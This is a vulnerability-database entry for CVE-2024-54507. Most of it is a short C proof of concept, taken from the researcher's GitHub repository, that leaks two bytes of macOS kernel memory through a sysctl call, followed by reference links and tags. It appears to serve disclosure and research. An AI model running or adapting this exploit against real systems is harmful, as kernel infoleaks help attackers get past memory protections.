vulnerability:exploitability=documented vulnerability:information=PoC

Created on 2025-01-24 06:21 and updated on 2025-01-24 06:32.

Description

// ravi (@0xjprx)
// 2-byte kernel infoleak, introduced in xnu-11215.1.10.
// gcc SUSCTL.c -o susctl
// ./susctl
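#include <stdint.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/sysctl.h>

void leak(void) {
    uint64_t val = 0;
    size_t len = sizeof(val);
    // Read the sysctl into an 8-byte buffer and stop if the call fails.
    if (sysctlbyname("net.inet.udp.log.remote_port_excluded", &val, &len, NULL, 0) != 0) {
        perror("sysctlbyname");
        return;
    }
    // Bytes 2 and 3 of the returned value are the two leaked bytes.
    printf("leaked: 0x%llX 0x%llX\n",
           (unsigned long long)((val >> 16) & 0x0FF),
           (unsigned long long)((val >> 24) & 0x0FF));
}

int main(void) {
    leak();
    return 0;
}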

from https://github.com/jprx/CVE-2024-54507


Associated vulnerability

CVE-2024-54507

Meta

[
   {
      ref: [
         "https://github.com/jprx/CVE-2024-54507",
         "https://jprx.io/cve-2024-54507/",
      ],
      tags: [
         "vulnerability:exploitability=documented",
         "vulnerability:information=PoC",
      ],
   },
]

Author

Cédric Bonhomme